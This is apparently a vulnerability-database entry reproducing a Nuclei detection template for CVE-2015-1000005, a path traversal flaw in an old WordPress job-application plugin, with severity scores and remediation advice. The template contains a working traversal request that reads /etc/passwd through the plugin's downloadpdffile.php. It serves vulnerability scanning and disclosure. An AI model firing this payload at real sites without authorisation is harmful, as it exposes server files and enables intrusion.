Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-1000005
HistoryFeb 12, 2022 - 5:38 p.m.

WordPress Candidate Application Form <= 1.3 - Local File Inclusion

2022-02-1217:38:06
ProjectDiscovery
github.com
5
arbitrary file downloads
wordpress
candidate application form
local file inclusion
vulnerability
wp plugin

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.053

Percentile

93.1%

WordPress Candidate Application Form &lt;= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
id: CVE-2015-1000005

info:
  name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
  author: dhiyaneshDK
  severity: high
  description: |
    WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server.
  remediation: |
    Update to the latest version of the plugin.
  reference:
    - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
    - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005
    - http://www.vapidlabs.com/advisory.php?v=142
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-1000005
    cwe-id: CWE-22
    epss-score: 0.05258
    epss-percentile: 0.93027
    cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: candidate-application-form_project
    product: candidate-application-form
    framework: wordpress
  tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a0046304402204f1f475fa4f52e36af22f8c1fd174fd227db3220068dd25993f009d04ecac0700220473d7e9f0bccadbcb97eaac77b5bde7a39bf0a25882afc8889ee9f4996cc1805:922c64590222798bb761d5b6d8e72950

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.053

Percentile

93.1%

Related for NUCLEI:CVE-2015-1000005